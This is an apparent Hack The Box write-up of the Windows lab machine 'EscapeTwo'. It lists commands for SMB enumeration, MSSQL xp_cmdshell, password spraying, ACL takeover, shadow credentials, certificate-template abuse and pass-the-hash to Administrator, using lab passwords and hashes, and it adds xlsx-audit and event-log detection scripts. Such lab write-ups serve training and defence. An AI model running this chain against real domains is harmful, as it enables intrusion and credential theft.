EscapeTwo Easy Machine - Hack the Box
Easy-level Windows machine from Season 7.
Information
EscapeTwo is an easy-level Windows machine from Season 7.
As is common in real-life Windows pentests, you start this box with credentials for the following account:
rose / KxEPkKe6R8su
Tools
- nmap: scan for open ports, services, etc.
- smbclient: enumerate shared folders and access a shared folder.
- crackmapexec: password spray if you have user and password lists.
- impacket:
  - secretsdump: attempt to dump NTLM hashes, LSA secrets, etc.
  - GetUserSPNs: request TGS tickets for accounts with SPNs; enumerate user accounts and obtain hashes to crack.
  - psexec: obtain a remote shell over SMB. Requires a user account with administrative rights.
  - owneredit: change the owner of an AD object. Commonly used when you have an account with the “WriteOwner” right and want to escalate privileges.
  - dacledit: change the ACL of an AD object. Commonly used together with owneredit to give a user FullControl.
  - mssqlclient: connect to an MSSQL server using Windows or SQL authentication. Commonly used to try xp_cmdshell or to read information from databases.
- evil-winrm: access the target Windows machine through WinRM and obtain a shell. Requires valid credentials.
- certipy-ad: interact with AD CS. Commonly used to exploit AD CS and obtain a privileged certificate (e.g. Administrator) from vulnerable templates, using an account with the “certificate request” right.
- pywhisker & PKINITtools: pywhisker manipulates msDS-KeyCredentialLink, the attribute that stores public-key based credentials and enables passwordless logins. PKINITtools requests a TGT using PFX/PEM files and obtains the AS-REP encryption key (gettgtpkinit), then gets the NT hash using that key (getnthash).
Step by step
- Start with an Nmap scan for open ports and services:
nmap -sV -v 10.10.11.51
We find many open ports, several of them related to Microsoft Windows / Active Directory. One of them is the SMB port, so we can start our testing there.
- We have a valid user “rose”, so we can check which shared folders she can view/access:
smbclient -L //10.10.11.51 -U rose --password=KxEPkKe6R8su
We find one folder called “Accounting Department”; let’s try to access it:
smbclient //10.10.11.51/Accounting\ Department -U rose --password=KxEPkKe6R8su
Inside this folder are two .xlsx documents whose names look interesting: accounting_2024.xlsx and accounts.xlsx. Let’s get them:
get accounting_2024.xlsx
get accounts.xlsx
- When we try to open these files with Microsoft Excel or OpenOffice (for example) we get a corrupted-file error. Note that an .xlsx file is just a set of .xml files compressed into a single archive, so we can try to decompress it with 7-Zip/WinRAR (for example). After decompressing we get many files, and looking through them we can see some users and passwords. One interesting account is “sa@sequel.htb”. The “sa” account is the default administrator account for Microsoft SQL Server, and one of the open ports found with Nmap in the previous step was 1433, the default port for MSSQL.
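As an added example (not from the original writeup): because an .xlsx is just zipped XML, the cell text can be read without Excel even when a desktop app reports the file as corrupted. The script below builds a constructed, deliberately incomplete .xlsx container (only the shared-strings part is present), reads the strings straight out of the zip, and runs the kind of check a file-share audit would use to flag workbooks that carry a password column; all names and values are made up for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespace used by xl/sharedStrings.xml
NS = {"s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}


def build_sample_xlsx() -> bytes:
    """Constructed sample: a minimal .xlsx container holding only the shared-strings
    part. Enough for the parser below, but not for Excel, which would call it corrupted."""
    shared = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'count="4" uniqueCount="4">'
        "<si><t>Username</t></si><si><t>Password</t></si>"
        "<si><t>svc_demo@example.local</t></si>"
        "<si><r><t>Spring</t></r><r><t>2024!</t></r></si>"  # rich-text cell: two runs
        "</sst>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", shared)
    return buf.getvalue()


def shared_strings(xlsx_bytes: bytes) -> list[str]:
    """Read every shared string directly from the zip container.
    Rich-text cells are split into <r> runs, so the <t> pieces are joined back together."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    text_tag = f"{{{NS['s']}}}t"
    return ["".join(t.text or "" for t in si.iter(text_tag)) for si in root.findall("s:si", NS)]


def has_credential_header(strings: list[str]) -> bool:
    """Audit check: flag a workbook whose strings include a password-style column header."""
    return any(s.strip().lower() in {"password", "passwd", "pwd"} for s in strings)
```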
- Let’s try our new interesting account with impacket-mssqlclient and see if we can get a command shell:
impacket-mssqlclient sequel.htb/sa@10.10.11.51
We’re in! From here we can access the databases or try to obtain a shell using xp_cmdshell. Listing the databases shows nothing interesting, so let’s try xp_cmdshell:
enable_xp_cmdshell
xp_cmdshell
Searching the Users directory we find a user called “ryan” and the Administrator folder too. Probably “ryan” is our target for the user flag. After more listing of directories and their contents, we find C:\SQL2019\ExpressAdv_Enu\sql-configuration.ini. Dumping its content shows another interesting account: sql_svc.
- At this point we have a nice list of users and passwords. Let’s try password spraying to see if some accounts share their passwords:
crackmapexec smb 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success
“ryan” shares the same password as “sql_svc”!
- Using our newest discovery, let’s try to access the share through smbclient again:
smbclient //10.10.11.51/Users -U ryan --password=WqSZAF6CysDQbGb3
From here we can access ryan’s home folder and get the user.txt flag!
USER FLAG PWNED
Now for the system (Administrator) flag, things start to get a bit tricky.
We can try impacket-secretsdump and impacket-psexec, or impacket-GetUserSPNs and then crack the password from the hashes, but none of those techniques gives successful results.
At this point it looks like we’re stuck, BUT maybe we are just not seeing hidden information about the accounts and objects we already have.
This is where BloodHound can save your life. With BloodHound we can view the relations, information, vulnerabilities, etc. of the AD objects we already have. Dumping the information and loading it into BloodHound, we find that the user “ryan” has a WriteOwner relationship over the “ca_svc” account, and this can be abused with several techniques.
Looking at ca_svc’s information in BloodHound we can see it’s a member of the “Cert Publishers” group. Maybe using this account we can check for misconfigured certificates, and by the account name it seems to be some kind of certificate manager/service, but for this we need a password or hash to use “certipy-ad”.
Following the BloodHound recommendations for Linux abuse, first of all we need to edit the owner and rights of “ca_svc” using “ryan”:
impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
Now we can try any of the BloodHound abuse recommendations. Kerberoasting doesn’t seem to be a good choice, because we would need to crack the password from the hash afterwards.
Doing a “Force Password Change” and then using the account would work, but be careful with password changes, because they can impact services or configurations on the operating system and cause errors.
Finally, a “Shadow Credentials attack” seems to be the best choice.
- After editing the owner and rights, we can proceed with:
pywhisker -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 --target "ca_svc" --action "add"
This exports the “ca_svc” certificate and key, to be used later to obtain a TGT.
- Request the TGT with the exported certificate:
gettgtpkinit -cert-pem namecaexported_cert.pem -key-pem namecaexported_priv.pem sequel.htb/ca_svc ca_svc.ccache
We obtain a TGT and the AS-REP encryption key.
export KRB5CCNAME=ca_svc.ccache
- Get the NT hash using the AS-REP key:
getnthash -key 89094d6d21e9b86e1c0b3b541431ca344171453c6ae71270d4fd7de696a31146 sequel.htb/CA_SVC
We obtain the “ca_svc” NT hash. Now we can use “certipy-ad” with this hash.
- Look for vulnerable templates:
certipy-ad find -vulnerable -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -stdout
We find a vulnerable certificate template called “DunderMifflinAuthentication”.
- Using this template and “ca_svc” we can request the administrator certificate:
certipy-ad req -username 'ca_svc@sequel.htb' -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.51
- Now we can authenticate with the exported certificate to get the password hash:
certipy-ad auth -pfx administrator.pfx -domain sequel.htb
- Finally we can use this hash to log in as administrator:
impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 7a8d4e04986afa8ed4060f75e5a0b3ff:7a8d4e04986afa8ed4060f75e5a0b3ff
Now you have shell access as Administrator; all that’s left is to read the system flag in the Administrator home folder.
SYSTEM FLAG PWNED
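As an added defensive example (not part of the original writeup): the owneredit/dacledit step rewrites the nTSecurityDescriptor of “ca_svc” and pywhisker adds a value to its msDS-KeyCredentialLink, and both writes are logged by the domain controller as Security event 5136 when “Audit Directory Service Changes” is enabled and the objects carry a write SACL. The script below correlates constructed 5136 records into that chain; the field names follow the 5136 schema, while the sample values and the trusted-writer list are assumptions for the example.

```python
# Constructed sample records, simplified from Windows Security event 5136
# ("A directory service object was modified"). Field names follow the 5136
# schema; the values are made up for this example.
EVENTS = [
    {"EventID": 5136, "SubjectUserName": "ryan", "OperationType": "Value Added",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=sequel,DC=htb", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "SubjectUserName": "ryan", "OperationType": "Value Added",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=sequel,DC=htb", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "DC01$", "OperationType": "Value Added",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=sequel,DC=htb", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "alice", "OperationType": "Value Added",
     "ObjectDN": "CN=alice,CN=Users,DC=sequel,DC=htb", "AttributeLDAPDisplayName": "telephoneNumber"},
]

# Attributes the owneredit/dacledit -> pywhisker chain has to write, mapped to a rule name.
WATCHED = {"nTSecurityDescriptor": "acl-change", "msDS-KeyCredentialLink": "shadow-credential"}
# Principals allowed to write them legitimately (assumption for the example; tune per environment).
TRUSTED_WRITERS = {"Administrator"}


def rdn_value(dn: str) -> str:
    """'CN=ca_svc,CN=Users,...' -> 'ca_svc'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def findings(events, trusted=TRUSTED_WRITERS):
    """One (rule, subject, target) per watched-attribute write done by a principal that is
    neither trusted nor the object itself (computer accounts roll their own key material)."""
    out = []
    for e in events:
        if e["EventID"] != 5136 or e["OperationType"] != "Value Added":
            continue
        rule = WATCHED.get(e["AttributeLDAPDisplayName"])
        if rule is None:
            continue
        who, target = e["SubjectUserName"], rdn_value(e["ObjectDN"])
        if who in trusted or who.rstrip("$").lower() == target.lower():
            continue
        out.append((rule, who, target))
    return out


def chained(findings_list):
    """(subject, target) pairs where the same principal rewrote the object's security
    descriptor and also added a key credential: the whole escalation chain, not a lone event."""
    seen = {}
    for rule, who, target in findings_list:
        seen.setdefault((who, target), set()).add(rule)
    return [pair for pair, rules in seen.items() if rules >= {"acl-change", "shadow-credential"}]
```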